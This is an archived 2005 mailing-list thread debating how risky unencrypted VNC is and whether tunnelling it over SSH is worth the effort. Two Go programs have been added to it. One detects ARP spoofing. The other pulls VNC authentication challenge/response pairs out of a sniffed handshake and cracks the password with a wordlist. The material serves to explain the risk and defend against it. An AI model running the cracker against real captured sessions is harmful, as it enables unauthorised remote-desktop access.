Security Basics mailing list archives

RE: VNC Security


From: "Joshua Berry" <jberry () PENSON COM>
Date: Thu, 21 Apr 2005 08:43:05 -0500

ARP spoofing would be possible as long as you are on the same network.
This would allow someone to monitor your traffic whether you are on a
switch or not, as long as they are in the same network on either the
client end or the server end.

My concern would be that employees and contractors who already have
*limited* access to the network could potentially get full server access
to anything running VNC, besides the fact that this would violate
several compliance requirements within my company.
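As an added illustration of the ARP spoofing point above (example code written for this page, not from the poster or from any VNC project), the Go program below decodes Ethernet/ARP frames and flags the symptom an ARP-spoofing host produces on a switched segment: an IP address that was answering from one MAC suddenly answering from another. The frames, the gateway address 192.168.1.1 and the MAC addresses are constructed inline to stand in for a capture.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"net"
)

const (
	etherTypeARP = 0x0806
	arpReply     = 2
)

// arpReplyInfo is the sender binding carried by one ARP reply.
type arpReplyInfo struct {
	SenderMAC net.HardwareAddr
	SenderIP  net.IP
}

// parseARPReply decodes an Ethernet II frame carrying IPv4-over-Ethernet ARP.
// It returns ok=true with the sender binding for ARP replies; frames of
// another ethertype and ARP requests return ok=false with no error.
func parseARPReply(frame []byte) (info arpReplyInfo, ok bool, err error) {
	if len(frame) < 14 {
		return info, false, errors.New("frame too short for an Ethernet header")
	}
	if binary.BigEndian.Uint16(frame[12:14]) != etherTypeARP {
		return info, false, nil
	}
	if len(frame) < 14+28 {
		return info, false, errors.New("frame too short for an ARP packet")
	}
	arp := frame[14:]
	hwType := binary.BigEndian.Uint16(arp[0:2])
	protoType := binary.BigEndian.Uint16(arp[2:4])
	if hwType != 1 || protoType != 0x0800 || arp[4] != 6 || arp[5] != 4 {
		return info, false, errors.New("unsupported ARP hardware/protocol type")
	}
	if binary.BigEndian.Uint16(arp[6:8]) != arpReply {
		return info, false, nil
	}
	// Copy out of the frame so callers do not alias the capture buffer.
	info.SenderMAC = net.HardwareAddr(append([]byte(nil), arp[8:14]...))
	info.SenderIP = net.IP(append([]byte(nil), arp[14:18]...))
	return info, true, nil
}

// Detector remembers the MAC first seen for each IP and reports when a later
// reply claims the same IP from a different MAC.
type Detector struct {
	bindings map[string]string // IP -> MAC
}

func NewDetector() *Detector { return &Detector{bindings: map[string]string{}} }

// Observe feeds one frame and returns a non-empty alert when the frame
// changes an existing IP->MAC binding. The new binding is recorded so a
// flapping attacker produces an alert on every change, not just the first.
func (d *Detector) Observe(frame []byte) (alert string, err error) {
	info, ok, err := parseARPReply(frame)
	if err != nil || !ok {
		return "", err
	}
	ip, mac := info.SenderIP.String(), info.SenderMAC.String()
	if prev, seen := d.bindings[ip]; seen && prev != mac {
		d.bindings[ip] = mac
		return fmt.Sprintf("ARP binding change for %s: %s -> %s", ip, prev, mac), nil
	}
	d.bindings[ip] = mac
	return "", nil
}

// buildARPReply constructs a 42-byte ARP reply frame for the demo
// (constructed sample input, not captured traffic).
func buildARPReply(senderMAC, senderIP, targetMAC, targetIP string) []byte {
	smac, _ := net.ParseMAC(senderMAC)
	tmac, _ := net.ParseMAC(targetMAC)
	sip := net.ParseIP(senderIP).To4()
	tip := net.ParseIP(targetIP).To4()
	frame := make([]byte, 0, 42)
	frame = append(frame, tmac...)
	frame = append(frame, smac...)
	frame = append(frame, 0x08, 0x06)                   // ethertype ARP
	frame = append(frame, 0, 1, 0x08, 0x00, 6, 4, 0, arpReply) // Ethernet/IPv4, reply
	frame = append(frame, smac...)
	frame = append(frame, sip...)
	frame = append(frame, tmac...)
	frame = append(frame, tip...)
	return frame
}

func main() {
	d := NewDetector()
	frames := [][]byte{ // constructed: gateway answers, then an impostor claims its IP
		buildARPReply("aa:bb:cc:dd:ee:01", "192.168.1.1", "aa:bb:cc:dd:ee:10", "192.168.1.10"),
		buildARPReply("aa:bb:cc:dd:ee:01", "192.168.1.1", "aa:bb:cc:dd:ee:10", "192.168.1.10"),
		buildARPReply("de:ad:be:ef:00:01", "192.168.1.1", "aa:bb:cc:dd:ee:10", "192.168.1.10"),
	}
	for _, f := range frames {
		if alert, err := d.Observe(f); err != nil {
			fmt.Println("error:", err)
		} else if alert != "" {
			fmt.Println(alert)
		}
	}
}
```

A real deployment would feed Observe from a capture source (pcap or AF_PACKET) instead of the constructed list; the detection logic is what the example shows. It also fires on legitimate changes such as a replaced NIC or a failover, so treat an alert as something to correlate with the switch's MAC table rather than act on blindly.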

-----Original Message-----
From: Steve Bostedor [mailto:Steveb () tshore com] 
Sent: Tuesday, April 19, 2005 7:57 PM
To: Alexander.Bolante () gmail com
Cc: security-basics () securityfocus com; vnc-list () realvnc com
Subject: RE: VNC Security

Thank you for the reply, Alexander.  I understand exactly what you're
trying to say.  I'm not sure if you fully understand what I was saying,
and it's probably my fault for not making it clear enough.

You seemed to concentrate on how easy it is to do things with the VNC
packets once you've sniffed the packets.  You say that you've sniffed
the packets before but have you ever sniffed packets from a network
outside of your own LAN?  How about on your LAN but on another switch
port?

What I was trying to discuss is how real the threat is that someone
outside of your network will actually get to sniff enough of, and the
correct sequence of, your packets to do the things that you were able to
do by sniffing the packets on your local segment.

You're basically breaking into your own house by using your own keys in
the scenario that you provided.  How realistic is it for someone in
India to sniff my packets going from a server in Detroit, MI to a server
in Jackson, MI?  How realistic is it for him to actually get usable
data?

It's easy to say that if there's a way into your network, you're
insecure, but there's a way into your house .. is your house insecure?
Is VNC really the low-hanging fruit in my scenario?

I know that you all are very specific and technical, so I'll spell out
an exact scenario which happens to be the most common usage of VNC in
companies.
--------
* John Doe is getting an error message on his computer and calls the
help desk a city away for help.

* Helpdesk tells John to double-click on the VNC icon on his desktop
that starts the server.

* Helpdesk connects to John's computer and takes about 10 minutes to
resolve the problem.

* Helpdesk person kills the VNC server on the remote computer and the
connection is terminated.

------- 

I understand that security is very important, but it's also very
important not to go Barney Fife and start drawing the gun on everything
that moves, if you get what I mean.  What are the odds that some guy in
Florida is going to sniff that 10 minute session and get into the
network?  My answer is 1 in at least 10 million.

The guy in Florida would have to have already compromised a computer on
either of the networks that happened to be plugged into a HUB (not a
switch) that either of the computers are plugged into ~OR~ he would have
had to hack one of the routers close to either one of them to send
packets to him as a man-in-the-middle attack of sorts.

Both of these are a bit extreme for VNC data theft, don't you think?  If
you do all of that, aren't there a bunch of much bigger prizes at your
fingertips than VNC data?!

Now are you starting to see what I'm saying?  The successful exploits
that must be done to get someone's VNC packet stream would land you
access to things far greater than just the VNC data and who would waste
the time with VNC data at that point?  Go for the gold, you're already
in someplace pretty good at that point.

The only EASY ways that I know of to sniff someone's packets are either
to be on a hub with the remote computers or to have a Trojan on one of
the computers.  Does someone know of an easy way other than that?
Easier than just hacking into the company in other ways that do not
involve VNC?

- Steve
-----Original Message-----
From: Alexander Bolante [mailto:alexander.bolante () gmail com]
Sent: Tuesday, April 19, 2005 6:25 PM
To: Steve Bostedor
Cc: security-basics () securityfocus com; vnc-list () realvnc com
Subject: Re: VNC Security


IMHO

NOTE:
For the obvious reason that VNC provides remote access to your machine,
security is key (period). I'm assuming this thread does NOT pertain to
your COMPANY LAN, because if it does, the answer to your question,
"Why should I secure VNC over SSH?" is clearly...SOX compliance...

OTHERWISE:
Bottom line is -- if you DO NOT have any sensitive data to secure,
it's your prerogative to determine what lengths you want to take to
protect that data. Why do I tunnel VNC over SSH? To deal with the
uncertainty of potential security flaws and risks...

(SB wrote) What are the real risks of not securing VNC traffic? It
depends...
The only caveat I see in not securing VNC traffic is...network
eavesdropping

We already know that all VNC traffic between client and server is
unencrypted after authentication. That's a problem if you're moving
sensitive data. I've used a sniffer on a VNC session before. The
traffic was compressed, so it was still difficult to understand and
break down the data from the sniffer, BUT data passed in clear text
e.g. usernames, birthdate, home address, etc. could be useful
***depending on the malicious user's intentions***.

And because we often do NOT know what a malicious user's intentions
are, we mitigate that uncertainty by adding another layer of
security/defense in depth...tunneling VNC over SSH in order to secure
communication and not leave ports open for scanning; using TCP
wrappers to provide access control on a per-IP address basis, etc.


On 4/19/05, Steve Bostedor <Steveb () tshore com> wrote:
I'd like to know if anyone has any working examples of why an
unencrypted VNC session over the Internet is seen as such a horrible
security risk.  I understand that unencrypted ANYTHING over the Internet
lends the chance for someone to decode the packets (assuming that they
capture every one of them) but in reality, what are the real risks here
and has anyone successfully captured a VNC session from more than 2
router hops away and actually gotten any meaningful information from
it?

I've captured a big chunk of a LOCAL session using Ethereal and the only
thing that I can see that is usable is the password exchange.  Agreed
that this could be a problem if someone just happened to be sniffing
your local LAN segment at that exact moment and happened to capture your
encrypted VNC password, he could crack the password and log in himself.
But how paranoid is it to go through all of the trouble of setting up
SSH to avoid that when you could just change your VNC password often and
make sure that your local LAN is reasonably secure from prying eyes?

How about once it gets out on the Internet?  Packets bounce all over the
place on the Internet.  What are the odds that someone out there will
pick your VNC packets out of all of the millions of packets running
through the backbone routers without being noticed, capture enough of
them to possibly replay a session, and actually have the patience or the
tools to do so.  I've scoured the web out of this curiosity, looking for
a tool to put VNC packets together into something useful for a hacker.
There's nothing.  Nada.

So, I guess that what I'm asking is; what is all of the fuss about?
Your POP3 password likely gets passed unencrypted but we're being asked
to be paranoid about an encrypted VNC password?  This is all coming from
a discussion that I had with someone over the merits of using SSH with
VNC over the internet for a 10 minute VNC session.

Does anyone have anything that's not hypothetical?  Is there a tool that
I'm missing out there that does more than just crack a VNC password?
Does anyone know of any reported security breaches where VNC was a
weakness?



-- 
"I know nothing" -- Alexander.Bolante () gmail com
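The password-capture risk the thread keeps circling (Steve's point that a sniffed "encrypted" VNC password can be cracked, and Alexander's that only the authentication step is protected at all) can be made concrete. The Go program below is an added example written for this page, not code from anyone on the list or from any VNC implementation. It assumes an RFB 3.3 handshake with VNC Authentication (security type 2): the server sends a 16-byte random challenge, the client returns it DES-encrypted in two ECB blocks under a key made from the password (truncated or zero-padded to 8 bytes, with the bit order of each byte reversed). The server and client byte streams, the password hunter2, the fixed challenge and the word list are all constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/binary"
	"errors"
	"fmt"
	"math/bits"
)

// vncKey turns a VNC password into the 8-byte DES key used by the RFB
// VNC Authentication scheme: truncate or zero-pad to 8 bytes, then reverse
// the bit order of every byte (a quirk of the original VNC DES code that
// compatible clients and servers reproduce).
func vncKey(password string) []byte {
	key := make([]byte, 8)
	copy(key, password) // anything past 8 characters is silently dropped
	for i := range key {
		key[i] = bits.Reverse8(key[i])
	}
	return key
}

// vncResponse computes the 16-byte response a client sends for a 16-byte
// challenge: DES-ECB of each 8-byte half under vncKey(password).
func vncResponse(password string, challenge []byte) ([]byte, error) {
	if len(challenge) != 16 {
		return nil, errors.New("challenge must be 16 bytes")
	}
	block, err := des.NewCipher(vncKey(password))
	if err != nil {
		return nil, err
	}
	resp := make([]byte, 16)
	block.Encrypt(resp[:8], challenge[:8])
	block.Encrypt(resp[8:], challenge[8:])
	return resp, nil
}

// extractAuth pulls the challenge and response out of the first bytes of an
// RFB 3.3 session, given the reassembled server->client and client->server
// TCP payloads. Layout for 3.3: 12-byte version string each way, a 4-byte
// big-endian security type from the server (2 = VNC Authentication), then
// the 16-byte challenge (server) and 16-byte response (client).
func extractAuth(serverToClient, clientToServer []byte) (challenge, response []byte, err error) {
	const version = "RFB 003.003\n"
	if len(serverToClient) < 12+4+16 || len(clientToServer) < 12+16 {
		return nil, nil, errors.New("streams too short for an RFB 3.3 handshake")
	}
	if string(serverToClient[:12]) != version || string(clientToServer[:12]) != version {
		return nil, nil, errors.New("not an RFB 3.3 handshake")
	}
	if secType := binary.BigEndian.Uint32(serverToClient[12:16]); secType != 2 {
		return nil, nil, fmt.Errorf("security type %d is not VNC Authentication", secType)
	}
	return serverToClient[16:32], clientToServer[12:28], nil
}

// crackPassword tries each candidate against the sniffed pair offline and
// returns the first password whose computed response matches, or "".
func crackPassword(challenge, response []byte, candidates []string) string {
	for _, pw := range candidates {
		got, err := vncResponse(pw, challenge)
		if err == nil && bytes.Equal(got, response) {
			return pw
		}
	}
	return ""
}

// buildSession constructs the two byte streams a sniffer would see for the
// given password and challenge (constructed sample input, not a capture).
func buildSession(password string, challenge []byte) (serverToClient, clientToServer []byte, err error) {
	resp, err := vncResponse(password, challenge)
	if err != nil {
		return nil, nil, err
	}
	s2c := []byte("RFB 003.003\n")
	s2c = append(s2c, 0, 0, 0, 2) // security type 2 = VNC Authentication
	s2c = append(s2c, challenge...)
	s2c = append(s2c, 0, 0, 0, 0) // SecurityResult OK
	c2s := []byte("RFB 003.003\n")
	c2s = append(c2s, resp...)
	return s2c, c2s, nil
}

func main() {
	challenge := []byte("0123456789abcdef") // constructed; a real server sends random bytes
	s2c, c2s, err := buildSession("hunter2", challenge)
	if err != nil {
		panic(err)
	}
	ch, re, err := extractAuth(s2c, c2s)
	if err != nil {
		panic(err)
	}
	wordlist := []string{"password", "vnc", "letmein", "hunter2"} // constructed
	fmt.Printf("recovered password: %q\n", crackPassword(ch, re, wordlist))
}
```

This is why one captured handshake is enough: the challenge/response pair is a complete offline oracle for guessing the password, the effective secret is at most 8 characters, and nothing from the later screen traffic is needed. Tunnelling the session over SSH takes the handshake off the wire altogether, which is the mitigation Alexander describes.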

